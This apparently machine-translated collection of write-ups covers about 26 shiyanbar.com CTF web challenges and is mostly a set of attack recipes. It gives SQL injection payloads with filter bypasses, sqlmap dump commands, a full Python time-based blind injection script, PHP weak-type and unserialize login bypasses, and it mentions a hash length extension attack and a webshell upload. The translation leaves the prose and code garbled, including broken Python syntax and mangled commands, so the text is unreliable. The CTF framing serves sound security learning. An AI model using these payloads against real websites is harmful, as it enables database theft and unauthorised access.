#简单的SQL注入
http://www.shiyanbar.com/ctf/1875
1) Try to id=1, no errors.
2) Try to id=1 ', error, there is echo, indicating that there are injection points:
You have a error in your SQL syntax; Check the manual-corresponds to your MySQL server version for the Rightsyntax-to-use near "" at line 13) first expect the background table to be named FL AG, so the structure of the Union select Flag from FLAG4) is based on the second part of the judgment, so add a ', the following statement needs another ' to end, the injection statement is? id=1 ' union Select flag from flag where ' t ' = ' T-ECHO is: You had an error in your SQL syntax; Check the manual-corresponds to your MySQL server version for the right syntax-use-near ' t ' = ' t ' in line 1
Analysis: According to the error, only the variables, the other keywords are not filtered 5) The keyword From,where write two times to try, the result error: corresponds to your MySQL server version for the right syntax to use n Ear ' Unionselectflag fromflag where ' t ' = ' t ' in line 1 found space is filtered!
6) Use the ' + ' sign instead of a space:? Id=1 ' +union+select+flag+from+flag+wherewhere+ ' t ' = ' t
#简单的SQL注入之2
http://www.shiyanbar.com/ctf/1908
1. Normal display id=1, id=2, id=3 show normal description only three lines
2.id=1 ' show MySQL statement error probably judge MySQL statement for select name from user where id= ' input '
3.id=1 ' In the middle there is a space showing SQLi detected! Description space is filtered
Combined with these three kinds of displays, we can tell that the 1 interface plus our SQL statement can actually execute the injection statement we want to execute.
Keep the simple judgment.
Id=1 '%0band%0b ' 1 ' = ' 1%0b indicates a space and there are similar%0a-%0z +/**/can try
Show Normal
Id:1 ' and ' 1 ' = ' 1name:baloteli
and continue the test.
It's good to find this logical method.
? id=1 ' | | ' ID ' | | ' You can display the data in the table and then the statement is the select name from the user where id= ' 1 ' | | ' ID ' | | ' closed want to show all the records in the table can add a few more | | ' As long as the statement is closed, you can
Id:1 ' | | ' ID ' | | ' Name:baloteli
Id:1 ' | | ' ID ' | | ' Name:kanawaluo
Id:1 ' | | ' ID ' | | ' Name:dengdeng
And then continue to combine web1 we can guess there's a flag table.
Find the hex code to get it done.
? id=1 '/*!u%6eion*//*!se%6cect*/flag/*!from*/flag/*!where*/' = '
Direct Getflag
#简单的SQL注入之3
http://www.shiyanbar.com/ctf/1909
The subject, I only use SQL map to solve;
1) construct SQL MAP command: sqlmap-u "http://ctf5.shiyanbar.com/web/index_3.php?id=1"--dbs
Ran all the way down to get the database
2) re-construct the correct database: Qlmap-u "http://ctf5.shiyanbar.com/web/index_3.php?id=1"--current-db
3) construct again to get the table name: Sqlmap-u "Http://ctf5.shiyanbar.com/web/index_3.php?id=1"--tables
4) construct again to find the column in the flag table name: Sqlmap-u "http://ctf5.shiyanbar.com/web/index_3.php?id=1"--COLUMNS-T "flag"
5) construct the dump again: Sqlmap-u "http://ctf5.shiyanbar.com/web/index_3.php?id=1"--dump-c "flag"-t "flag"
Tips: If SQL map runs quickly, it is recommended to use SQL map, but mastering manual injection is the kingly way.
#天下武功唯快不破
http://www.shiyanbar.com/ctf/1854
First look at the source code
Let's submit the found key for post submission, and look at the request header
Flag is found, of course, the key when the parameter is submitted to the solution of the flag to post, but must be fast, then only the script, the following is attached script
Import requests
Import Base64
url = ' http://ctf5.shiyanbar.com/web/10/10.php '
rs = requests.get (URL). headers[' FLAG ']
v = base64.b64decode (RS)
Print requests.post (url=url,data={' key ': V.split (': ') [1]}). Content
Tips: For non-requests modules and Base64 modules can be pip download, not PIP can refer to my previous blog
#拐弯抹角
http://www.shiyanbar.com/ctf/1846
According to this passage, add index.php after the URL to get flag
#Forms
http://www.shiyanbar.com/ctf/1819
F12 View Source Code First
Find the value of Showsource to 0, change to 1, get hidden source code
Appear
if ($a = =-19827747736161128312837161661727773716166727272616149001823847)
Change the value of the PIN to
#天网管理系统
http://www.shiyanbar.com/ctf/1810
First right click to view source code (manual funny
Here we are asked to enter a string, after MD5 equals 0, which is the test of PHP weak type. Here I provide 4 values that can be passed;
Then Baidu 0 start of the md5:http://www.mamicode.com/info-detail-1719711.html
Enter one of the display in the user name
then you know;
Open the link:
$unserialize _str = $_post[' password '); $data _unserialize = unserialize ($unserialize _str); if ($data _unserialize[' user '] = = '??? ' && $data _unserialize[' pass ']== '??? ') {Print_r ($flag);} The great scientist Php dialect way: Into also Boolean, defeated also Boolean. Go back to the tart years.
This code is not difficult to understand, that is, the post submitted by the password value of "deserialization" to get an array, requiring the array of user and pass are satisfied, print flag, but we do not know '??? ' is what, but we can notice that the information is used in the judgment condition = =, is also the PHP weak type;
<?php if (true== "Pcat") {echo "OK";}?>
True of type bool is equal to any string that can be weakly typed, and when there is unserialize or Json_decode in the code, we can construct the bool type to achieve deception. Now we construct an array, inside Han 2 elements, the user and pass, respectively, is the bool type of true, so we get
A:2:{s:4: "User"; B:1;s:4: "Pass"; b:1;}
(a means array,s represents string,b on behalf of BOOL, and the number represents the number/length)
Finally, you can submit it by post in the Password area field.
#Once more
http://www.shiyanbar.com/ctf/1805
A simple code audit problem, according to the IF statement requirements, password must be greater than 9999999 and also equal to *-*
OK, just construct password, password=1e8%00*-*.
(Note:%00 is simply added in the number "-" will be meaningless, after using%00 truncation, plus *-*
Look back to flag,over!
#Guess Next Session
http://www.shiyanbar.com/ctf/1788
This topic needs to use the Firefox browser, then the next Firefox plugin, the cookie manager+
The usual, first look at the source code
Indicates that the value obtained by get must be equal to the value of the session.
Using cookies managers +, delete php session
Direct guess
#FALSE
http://www.shiyanbar.com/ctf/1787
- <title>level1</title>
- <link rel=' stylesheet ' href=' style.css ' type= ' text/css ' >
- <body>
- <?php
- Require ' flag.php ';
- if (Isset ($_get[' name ") and isset ($_get[' password '])) {
- if ($_get[' name '] = = $_get[' password '))
- Print ' Your password can not is Your name. ';
- Else if (SHA1 ($_get[' name ') = = = = SHA1 ($_get[' password ']))
- Die (' Flag: '. $flag);
- Else
- Print ' <p class= ' alert ' >invalid password.</p> ';
- }
- ?>
- <section class="Login" >
- <div class="title" >
- <a href="./index.txt" >level 1</a>
- </div>
- <form method="Get" >
- <input type="text" required name="name" placeholder="name"/><br/>
- <input type="text" Required name="password" placeholder= "password"/><br/>
- <input type="Submit"/>
- </form>
- </section>
- </body>
Parsing the code logic, found that get two fields name and password, the condition to get the flag requirement is: Name! = password & SHA1 (name) = = SHA1 (password), at first glance it seems impossible, You can actually use the SHA1 () function to bypass the vulnerability. If these two fields are constructed as an array, such as:? Name[]=a&password[]=b, the two arrays are indeed different when judged at the first, but when judged at the second place, the SHA1 () function cannot handle the array type, the error is returned and the false,if condition is set. Get flag.
#上传绕过
http://www.shiyanbar.com/ctf/1781
Chopper, a word trojan OK
#what a fuck! What the hell is this?
Http://www.shiyanbar.com/ctf/56
Very characteristic, jother encoded, a bunch of parentheses. Can be decoded online, but for offline exams, in Chrome browser, F12, there is a console, paste all code, enter, eject key
#这个看起来有点简单
Http://www.shiyanbar.com/ctf/33
Using SQL injection
Federated Lookup
http://ctf5.shiyanbar.com/8/index.php?id=1%20union%20select%201,1
Check the database
Http://ctf5.shiyanbar.com/8/index.php?id=1%20union%20select%201,SCHEMA_NAME%20from%20information_schema.SCHEMATA
Guess table name
Http://ctf5.shiyanbar.com/8/index.php?id=1%20union%20select%201,TABLE_NAME%20from%20information_schema.TABLES
Guess Field
Http://ctf5.shiyanbar.com/8/index.php?id=1%20union%20select%201,COLUMN_NAME%20from%20information_schema.COLUMNS
K0y most suspicious, so submitted
Http://ctf5.shiyanbar.com/8/index.php?id=1%20union%20select%201,k0y%20from%20thiskey
#头有点大
Http://www.shiyanbar.com/ctf/29
Firefox or Chrome F12
Click Edit and re-send, edit the information, modify the language, and add a. NET Framework 9.9, which is adding. NET CLR 9.9 (with a semicolon)
Send and preview
#Forbidden
Http://www.shiyanbar.com/ctf/21
F12, select Network, then reload, click Edit and send
Modify ZH-CN to Zh-hk
Flag can be seen on the preview page after sending
#猫捉老鼠
Http://www.shiyanbar.com/ctf/20
Based on the topic "catch", use Burpsuite to grab the packet and send the packet capture data to the repeater
Click Go directly, look at the response output, find the following line in the table header prompt
After copying "mtq4odg2oda4ma==", replace the previous input 123 in Repeater, view response, and find that the key has been obtained.
#登录一下好吗?
http://www.shiyanbar.com/ctf/1942
Explained below:
Calculate username= ' TG ' in the general database can not have my nickname (if any, you will change a string), so here the return value is 0 (equivalent to false)
and then 0 = "What about the result?" See here The estimate you also understand, just return 1 (equivalent to TRUE)
So this injection is equivalent to
SELECT * from user where 1 and 1
Also equals select * from user
(This problem only filtered out the results have more than 3 to show flag, did not always say "sorry, no this user!! ”)
OK, keep nagging, the comparison above is a weak type of comparison,
The following conditions will be true
1= ' 1 '
1= ' 1.0 '
1= ' 1 followed by a letter (and then a number can also be) '
0= ' except for strings that start with a non-0 digit '
(Overall, as long as the previous 0, to make the statement is true is very simple, so this question of the universal password as long as I have the above way to write a lot)
#who is that you?
http://www.shiyanbar.com/ctf/1941
Time injection, do not know how to search Baidu, I directly on the script not BB
Import requests
Import time
Import Sys
url = ' http://ctf5.shiyanbar.com/web/wonderkun/index.php '
Def retrivecurrentdatabase ():
ASCII =-1
index = 1
result = ""
While ' \x00 ' not in result:
ASCII = 0
For I in range (8):
sql = "222" and (case when (ASCII (SUBSTRING (select Database ()) from%d for 1) &%d!=0) then sleep (0.5) Else sleep (0) E nd) and ' 1 ' = ' 1 "% (index, POW (2, i))
headers = {' x-forwarded-for ': SQL}
StartTime = Time.time ()
Requests.get (URL, headers=headers)
if (Time.time ()-StartTime) > 0.5:
ASCII + = POW (2, i)
If CHR (ASCII)! = ' \x00 ':
Sys.stdout.write (Chr (ASCII))
Result + CHR (ASCII)
Index + = 1
return result
def retrivetable (database):
Database = "'" + Database + "'"
ASCII =-1
Row = 0
While True:
index = 1
result = ""
While ' \x00 ' not in result:
ASCII = 0
For I in range (8):
sql = "222" and (case when (ASCII (SUBSTRING () (select table_name from information_schema.tables where table_schema=%s limit 1 offset%d) from%d to 1) &%d!=0) then sleep (0.5) Else sleep (0) end) and ' 1 ' = ' 1 '% (database, row, index, POW (2, i))
headers = {' x-forwarded-for ': SQL}
StartTime = Time.time ()
Requests.get (URL, headers=headers)
if (Time.time ()-StartTime) > 0.5:
ASCII + = POW (2, i)
If CHR (ASCII)! = ' \x00 ':
Sys.stdout.write (Chr (ASCII))
Result + CHR (ASCII)
Index + = 1
if result = = ' \x00 ':
Break
ASCII =-1
Print (")
Row + = 1
Def dumpcolumn ():
ASCII =-1
Row = 0
While True:
index = 1
result = ""
While ' \x00 ' not in result:
ASCII = 0
For I in range (8):
sql = "222" and (case when (ASCII ((select flag from flag limit 1, offset%d) from%d to 1) &%d!=0) then Slee P (0.5) else sleep (0) end) and ' 1 ' = ' 1 '% (row, index, POW (2, i))
headers = {' x-forwarded-for ': SQL}
StartTime = Time.time ()
Requests.get (URL, headers=headers)
if (Time.time ()-StartTime) > 0.1:
ASCII + = POW (2, i)
If CHR (ASCII)! = ' \x00 ':
Sys.stdout.write (Chr (ASCII))
Result + CHR (ASCII)
Index + = 1
if result = = ' \x00 ':
Break
ASCII =-1
Row + = 1
def main ():
Database = Retrivecurrentdatabase ()
Print (' \ncurrent database is%s '% database)
Print (' let\ ' see the table name in the database! ')
Database = Database.replace ("\x00", "" ")
Retrivetable (Database)
Print (' let\ ' dump the flag! ')
Sys.stdout.write ("ctf{")
Dumpcolumn ()
Sys.stdout.write ("}")
if __name__ = = ' __main__ ':
Main ()
#因缺思厅的绕过
http://www.shiyanbar.com/ctf/1940
View source to get this thing, change the next URL
Come out with this thing
Here is the post data check, here is not the narrow sense of filtering, just check, check the sensitive characters on the output "water can carry boats, can also be rowing!" ", end.
The main checks are "and" "Select" "From" "where" "union" "Join" "Sleep" "benchmark" "," "(" ") what is commonly used in these SQL.
Database connection This piece has nothing to say. The next is to $_post[' uname ' directly into the SQL query interest table. Verifies that the query result is a row, and if the PWD column value of the query results is compared to $_post[' pwd ', the output flag is the same as the same.
The program seems to be quite simple, and the logic is clear. To get flag, two conditions are judged: mysql_num_rows ($query) = = 1 and $key[' pwd '] = = $_post[' pwd '].
Believe that there are individuals, code are not looking directly out of the Sqlmap, read the code, not recommended to do so, the benefits are very little ah. Look at the input check and you'll know.
Imagine if you control the results of the query with the Union SELECT, then the $key[' pwd ' and $_post[' pwd ' are all in our control, but the key to this path is through the input check. I tried a lot of methods manually, tried the input check, found in vain. Look at the code again, think of it, this check method, seems to be unable to check.
The strategy was then re-adjusted. We want to have two conditions to judge, from this point of fact the first condition is very good judgment: X ' or 1 limit, this is the first check. Then look at the second check $key[' pwd '] = = $_post[' pwd ']. Because we can't get the data in the database, at least I can't get it. It is only possible to control the $key[' pwd ' in this condition. I groped for a long time, almost gave up, and asked Pcat if there was anything to do here. The answer is yes, and gives some hints. Finally determine the target to make $key[' pwd '] null. But the input check is very strict, went to commas, parentheses and so on. To reach the goal, I looked through the MySQL handbook. The process is long and not due to lack of thought. The contents of the handbook are always in the mind during breakfast. After breakfast, I thought of the place to use. GROUP BY with Rollup.
X ' or 1 group by PWD with Rollup #
Finally according to PWD Null,playload:x ' or 1 group by PWD with rollup limit 1 OFFSET
#让我进去
http://www.shiyanbar.com/ctf/1848
Extended attack with hash length, principle, search Baidu, I'm not in this BB
Recommended first look at this link: http://www.cnblogs.com/pcat/p/5478509.html
This method has been introduced in detail, I will not repeat the
#忘记密码了
http://www.shiyanbar.com/ctf/1808
First Ctrl+u View the page source code: You can see the admin "[email protected]" editor for Vim.
Randomly lose one, pop-up JS box prompt password in step2.php. Then directly open the step2.php, found to jump back to step.php. Forget it, just use Fiddler to see it, sure enough is a 302 redirect. Then visit step2.php, in fact, it is built-in [email protected] sent to the submit.php. Then we revisit submit.php, which shows "you're not a admin".
This method does not work, looked at other people's writeup, said that vim will produce temporary files. Then we have access to the. Submit.php.swp in the browser, and sure enough there are files. Although there is garbled, but the code barely read. What is needed here is the EmailAddress and token two parameters. EmailAddress is just a, and token made a judgment, must be 0 and the length of 10.
Change Url:http://ctf5.shiyanbar.com/10/upload/[email protected]&token=0000000000
#NSCTF web200
http://www.shiyanbar.com/ctf/1760
The topic is a PHP encryption, we counter on the line
$DD = "A1zlbgqsceseiqrlwuqaymwlyq2l5vwbxqga3rqayumz0tmmvsgm2zwb4tws"; $s =str_rot13 ($DD); $a =strrev ($s); $b =base64_ Decode ($a); for ($e =0; $e {$g =substr ($b, $e, 1); $temp =ord ($g)-1; $g =chr ($temp); $aa = $aa. $g;} echo Strrev ($AA);? >
#程序逻辑问题
Http://www.shiyanbar.com/ctf/62
The problem is still stuck for hours,
The final playload:
User=1 Union Select concat (' BCBE3365E6AC95EA2C0343A2395834DD ')%23 &pass=222
At first I thought injected, and finally injected out to find the PW field is 111
So I tried the weak type and found nothing soft.
Finally think of union query
Select username from admin where ID =-1 Union select concat (' BCBE3365E6AC95EA2C0343A2395834DD ')
Principle: When no user with ID-1 is displayed, the Union statement is BCBE3365E6AC95EA2C0343A2395834DD
222 of MD5
At the same time, submit the pass=222 to the Golden Flash.
#PHP大法
Http://www.shiyanbar.com/ctf/54
You can tell by reading the code in Http://ctf5.shiyanbar.com/DUTCTF/index.php.txt
If the ID equals "HACKERDJ", the flag is not received, but after the decoding, the "HACKERDJ" is required.
So the first decoding is not "HACKERDJ", and the second time is "HACKERDJ", so encode two times just fine
(Do not need all the code, just find a letter, such as the last j->%254a can)
Http://ctf5.shiyanbar.com/DUTCTF/index.php?id=hackerD%254A
#貌似有点难
Http://www.shiyanbar.com/ctf/32
Open Burp intercept a request, add an X field to the HTTP header 1.1.1.1 forward.
Then you can see the key.
#看起来有点难
Http://www.shiyanbar.com/ctf/2
SQL injection, very simple, but run slowly, unexpectedly is 50 points, do not know where the extraordinary
The question is no problem, it is frighten people, it should be so, to believe in themselves, do not be confused by the things in front of you.
Under Remembrance
Experimental bar web question (26/26) Full writeup! Super Detail:)